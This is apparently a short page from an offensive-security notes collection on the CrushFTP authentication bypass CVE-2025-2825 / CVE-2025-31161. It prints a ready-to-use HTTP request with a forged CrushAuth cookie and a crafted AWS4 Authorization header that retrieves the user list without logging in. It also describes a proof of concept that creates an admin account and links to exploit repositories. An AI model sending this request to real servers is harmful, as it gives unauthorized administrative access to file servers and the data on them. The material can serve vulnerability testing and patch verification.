CrushFTP

CVE-2025-2825 - Authentication Bypass

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

CrushFTP Authentication Bypass - CVE-2025-2825 — ProjectDiscovery BlogProjectDiscovery

PoC

Proof of Concept for CVE-2025-31161 / CVE-2025-2825

This POC will exploit the authbypass vulnerability to create a new user account with Admin level permissions. The Auth Bypass requires the username (target_user) of an existing user on the CrushFTP server. The default is set to crushadmin

GitHub - Immersive-Labs-Sec/CVE-2025-31161: Proof of Concept for CVE-2025-31161 / CVE-2025-2825GitHub

3xplo1tz/CVE-2025-31161.py at main · gotr00t0day/3xplo1tzGitHub

PreviousCommvault NextCyberPanel

Last updated 2 months ago